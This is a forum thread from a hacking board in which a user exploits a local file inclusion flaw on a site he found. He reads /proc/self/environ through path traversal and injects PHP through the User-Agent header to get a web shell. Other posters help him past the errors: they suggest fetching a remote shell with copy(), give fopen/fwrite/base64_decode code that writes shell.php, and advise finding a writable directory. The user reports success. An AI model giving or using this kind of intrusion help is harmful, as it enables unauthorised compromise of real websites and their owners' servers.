Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)
-   -   LFI problems (https://forum.antichat.xyz/showthread.php?t=442807)

billybonse 04.10.2016 23:12
I've found a site with LFI include.

Trying to reach shell:

?page=../../../../../../../../../../../../proc/self/environ&cmd=ls;

user-agent -

error - Parse error: syntax error, unexpected T_VARIABLE, expecting T_STRING in /proc/164512/environ on line 1

Help plz.

billybonse 04.10.2016 23:15
When i tried to load shell with User-Agent

i've got error - Warning: copy(www.somesite.com/shell.php) [function.copy]: failed to open stream: No such file or directory in /proc/178928/environ on line 1

billybonse 04.10.2016 23:18
by the way, i can reach phpinfo with this user-agent -

mailbrush 05.10.2016 00:01
Цитата:
Сообщение от billybonse
billybonse said:

When i tried to load shell with User-Agent
i've got error -
Warning
: copy(
www.somesite.com/shell.php
) [
function.copy
]: failed to open stream: No such file or directory in
/proc/178928/environ
on line
1
Change www. to http://www. and make sure the webshell is served in plaintext, not as a rendered html page.

billybonse 05.10.2016 00:05
the same error:

Warning: copy(1.php) [function.copy]: failed to open stream: Permission denied in /proc/383125/environ on line 1

ol1ver 05.10.2016 01:42
Try make file and write content

http://php.net/manual/en/function.fwrite.php

Код:
Code:
$fp = fopen('shell.php', 'w+');
fwrite($fp, base64_decode('BASE64_BODY'));
fclose($fp);

mailbrush 05.10.2016 03:09
Цитата:
Сообщение от billybonse
billybonse said:

the same error:
Warning
: copy(1.php) [
function.copy
]: failed to open stream: Permission denied in
/proc/383125/environ
on line
1
It's not the same error. It means the webserver user doesn't have write permissions to the current directory. You've gotta find a writable directory and chdir to it before making upload requests.

billybonse 05.10.2016 09:39
problem solved, thx


Время: 01:35